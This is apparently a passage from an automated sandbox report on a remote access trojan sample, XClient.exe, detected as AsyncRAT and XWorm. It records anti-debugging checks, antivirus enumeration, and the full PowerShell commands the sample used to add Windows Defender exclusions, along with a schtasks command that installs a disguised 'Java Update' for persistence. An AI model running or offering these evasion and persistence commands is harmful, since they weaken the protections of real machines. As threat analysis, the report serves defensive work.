Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Java Update(32bit).exe	Thread delayed: delay time: 922337203685477

Source: Java Update(32bit).exe.0.dr	Binary or memory string: vmware
Source: XClient.exe, 00000000.00000002.2974888660.000000001C0C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\XClient.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\XClient.exe

Code function: 0_2_00007FFD9B877648 CheckRemoteDebuggerPresent,

0_2_00007FFD9B877648

Source: C:\Users\user\Desktop\XClient.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\ProgramData\Java Update(32bit).exe	Process token adjusted: Debug
Source: C:\ProgramData\Java Update(32bit).exe	Process token adjusted: Debug
Source: C:\ProgramData\Java Update(32bit).exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\XClient.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'

Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"	Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe	Queries volume information: C:\Users\user\Desktop\XClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\ProgramData\Java Update(32bit).exe	Queries volume information: C:\ProgramData\Java Update(32bit).exe VolumeInformation
Source: C:\ProgramData\Java Update(32bit).exe	Queries volume information: C:\ProgramData\Java Update(32bit).exe VolumeInformation
Source: C:\ProgramData\Java Update(32bit).exe	Queries volume information: C:\ProgramData\Java Update(32bit).exe VolumeInformation
Source: C:\ProgramData\Java Update(32bit).exe	Queries volume information: C:\ProgramData\Java Update(32bit).exe VolumeInformation
Source: C:\ProgramData\Java Update(32bit).exe	Queries volume information: C:\ProgramData\Java Update(32bit).exe VolumeInformation

Source: C:\Users\user\Desktop\XClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Source: XClient.exe, 00000000.00000002.2974888660.000000001C0C6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2934157338.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2974888660.000000001C12A000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2974888660.000000001C172000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2934157338.0000000001314000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
